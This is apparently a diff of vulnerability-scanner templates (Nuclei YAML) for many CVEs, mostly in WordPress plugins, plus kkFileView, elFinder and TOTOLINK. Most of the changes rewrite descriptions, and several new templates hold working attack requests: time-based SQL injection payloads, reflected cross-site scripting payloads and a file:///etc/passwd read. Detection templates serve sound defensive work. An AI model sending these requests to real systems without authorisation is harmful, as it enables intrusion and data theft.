GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_1
|
||||
words:
|
||||
- "TOTOLINK"
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
words:
|
||||
- "Set-Cookie: SESSION_ID="
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2021-43421
|
||||
|
||||
info:
|
||||
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
|
||||
name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload
|
||||
author: akincibor
|
||||
severity: critical
|
||||
description: |
|
||||
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
|
||||
Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.
|
||||
reference:
|
||||
- https://github.com/Studio-42/elFinder/issues/3429
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
|
||||
- https://twitter.com/infosec_90/status/1455180286354919425
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
regex:
|
||||
- '"hash"\:"(.*?)"\,'
|
||||
internal: true
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-43510
|
||||
|
||||
info:
|
||||
name: Simple Client Management System 1.0 - SQL Injection
|
||||
name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.
|
||||
Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
|
||||
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
|
||||
|
@ -43,3 +43,5 @@ requests:
|
|||
- 'contains(body_1, "{\"status\":\"success\"}")'
|
||||
- 'contains(body_2, "Welcome to Simple Client")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2021-43734
|
||||
|
||||
info:
|
||||
name: kkFileview v4.0.0 - Directory Traversal
|
||||
name: kkFileview v4.0.0 - Local File Inclusion
|
||||
author: arafatansari
|
||||
severity: high
|
||||
description: |
|
||||
kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.
|
||||
kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.
|
||||
reference:
|
||||
- https://github.com/kekingcn/kkFileView/issues/304
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-43734
|
||||
|
@ -17,19 +17,25 @@ info:
|
|||
metadata:
|
||||
shodan-query: http.html:"kkFileView"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,kkfileview,traversal
|
||||
tags: cve,cve2021,kkfileview,traversal,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
|
||||
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0:"
|
||||
- "for 16-bit app support"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -1,11 +1,12 @@
|
|||
id: CVE-2021-44451
|
||||
|
||||
info:
|
||||
name: Apache Superset - Default Login
|
||||
name: Apache Superset <=1.3.2 - Default Login
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: |
|
||||
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
|
||||
Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
remediation: Upgrade to Apache Superset 1.4.0 or higher.
|
||||
reference:
|
||||
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
|
||||
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
|
||||
|
@ -66,3 +67,5 @@ requests:
|
|||
regex:
|
||||
- 'name="csrf_token" type="hidden" value="(.*)"'
|
||||
internal: true
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0147
|
||||
|
||||
info:
|
||||
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
|
||||
name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
|
||||
- https://wordpress.org/plugins/wp-gdpr-compliance/
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-0234
|
||||
|
||||
info:
|
||||
name: WOOCS < 1.3.7.5 - Reflected Cross-Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0234
|
||||
- https://plugins.trac.wordpress.org/changeset/2659191
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-0234
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: inurl:"wp-content/plugins/woocommerce-currency-switcher"
|
||||
verified: "true"
|
||||
tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,woocs
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<img src onerror=alert(document.domain)>'
|
||||
- '"current_currency":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0346
|
||||
|
||||
info:
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
|
||||
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
|
||||
author: Akincibor,theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
|
||||
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
|
||||
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2022-0346
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
verified: "true"
|
||||
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
|
||||
|
||||
requests:
|
||||
|
@ -39,3 +39,5 @@ requests:
|
|||
part: body_2
|
||||
words:
|
||||
- "2ef3baa95802a4b646f2fc29075efe34"
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0349
|
||||
|
||||
info:
|
||||
name: NotificationX WordPress plugin < 2.3.9 - SQL Injection
|
||||
name: WordPress NotificationX <2.3.9 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.
|
||||
WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
|
||||
- https://wordpress.org/plugins/notificationx/advanced/
|
||||
|
@ -36,3 +36,5 @@ requests:
|
|||
- 'status_code == 200'
|
||||
- 'contains(body, "\"data\":{\"success\":true}")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0434
|
||||
|
||||
info:
|
||||
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
|
||||
name: WordPress Page Views Count <2.4.15 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
|
||||
WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
|
||||
- https://wordpress.org/plugins/page-views-count/
|
||||
|
@ -38,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-0784
|
||||
|
||||
info:
|
||||
name: WordPress Title Experiments Free <9.0.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
|
||||
- https://wordpress.org/plugins/wp-experiments-free/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0784
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0784
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "{\"images\":")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0785
|
||||
|
||||
info:
|
||||
name: Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi
|
||||
name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Daily Prayer Time WordPress plugin before 2022.03.01 does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
|
||||
WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
|
||||
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
|
||||
|
@ -34,3 +34,5 @@ requests:
|
|||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2022-0786
|
||||
|
||||
info:
|
||||
name: WordPress KiviCare <2.3.9 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30
|
||||
- https://wordpress.org/plugins/kivicare-clinic-management-system/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0786
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0786
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Doctor details")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0788
|
||||
|
||||
info:
|
||||
name: WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi
|
||||
name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WP Fundraising Donation and Crowdfunding Platform WordPress plugin before 1.5.0 does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users.
|
||||
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
|
||||
- https://wordpress.org/plugins/wp-fundraising-donation/
|
||||
|
@ -37,3 +37,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "Invalid payment.")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0817
|
||||
|
||||
info:
|
||||
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
|
||||
name: WordPress BadgeOS <=3.7.0 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
|
||||
WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
|
||||
- https://wordpress.org/plugins/badgeos/
|
||||
|
@ -39,3 +39,5 @@ requests:
|
|||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "badgeos-arrange-buttons")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-0826
|
||||
|
||||
info:
|
||||
name: WordPress WP Video Gallery <=1.7.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
|
||||
- https://wordpress.org/plugins/wp-video-gallery-free/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0826
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Registred videos :")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-0867
|
||||
|
||||
info:
|
||||
name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi
|
||||
name: WordPress ARPrice <3.6.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.
|
||||
WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
|
||||
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
||||
|
@ -42,3 +42,5 @@ requests:
|
|||
- 'contains(content_type_1, "text/html")'
|
||||
- 'contains(body_2, "ArpPriceTable")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2022-0948
|
||||
|
||||
info:
|
||||
name: WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
|
||||
- https://wordpress.org/plugins/woc-order-alert/
|
||||
- https://plugins.trac.wordpress.org/changeset/2707223
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0948
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0948
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /?rest_route=/olistener/new HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
content-type: application/json
|
||||
|
||||
{"id":" (SLEEP(6))#"}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(content_type_1, "application/json")'
|
||||
- 'contains(body_2, "olistener-action.olistener-controller")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1007
|
||||
|
||||
info:
|
||||
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
|
||||
name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
|
||||
- https://wordpress.org/plugins/advanced-booking-calendar/
|
||||
|
@ -42,3 +42,5 @@ requests:
|
|||
- "contains(all_headers_2, 'text/html')"
|
||||
- "status_code_2 == 200"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1057
|
||||
|
||||
info:
|
||||
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
|
||||
name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
|
||||
WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
|
||||
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
|
||||
|
@ -33,3 +33,5 @@ requests:
|
|||
- 'status_code == 500'
|
||||
- 'contains(body, "been a critical error")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2022-1168
|
||||
|
||||
info:
|
||||
name: JobSearch < 1.5.1 - Cross-Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1168
|
||||
- https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-1168
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: inurl:"wp-content/plugins/wp-jobsearch"
|
||||
verified: "true"
|
||||
tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<img src=x onerror=alert(domain)>"
|
||||
- "wp-jobsearch"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 404
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2022-1595
|
||||
|
||||
info:
|
||||
name: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
|
||||
- https://wordpress.org/plugins/hc-custom-wp-admin-url/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1595
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2022-1595
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
HEAD /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: valid_login_slug=1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "Location: ([a-zA-Z0-9_.\\/-]+)"
|
||||
- "wordpress_"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by md on 2023/01/06
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2022-1883
|
||||
|
||||
info:
|
||||
name: Terraboard < 2.2.0 - SQL Injection
|
||||
name: Terraboard <2.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.
|
||||
Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
